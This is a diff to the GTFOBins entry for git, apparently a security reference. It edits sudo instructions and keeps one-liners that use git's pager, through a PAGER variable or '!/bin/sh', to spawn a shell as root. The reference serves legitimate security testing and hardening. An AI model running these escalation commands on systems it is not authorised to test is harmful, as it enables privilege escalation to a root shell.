diff --git a/_gtfobins/git.md b/_gtfobins/git.md index 5d0443c..e9d0a92 100644 --- a/_gtfobins/git.md +++ b/_gtfobins/git.md @@ -8,9 +8,9 @@ functions: !/bin/sh sudo: - code: PAGER='sh -c "exec sh 0<&1"' sudo -E git -p help - - description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. Several capabilities might be dropped in the child process using this method. + - description: This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply. code: | - sudo git help config + sudo git -p help config !/bin/sh limited-suid: - code: PAGER='sh -c "exec sh 0<&1"' ./git -p help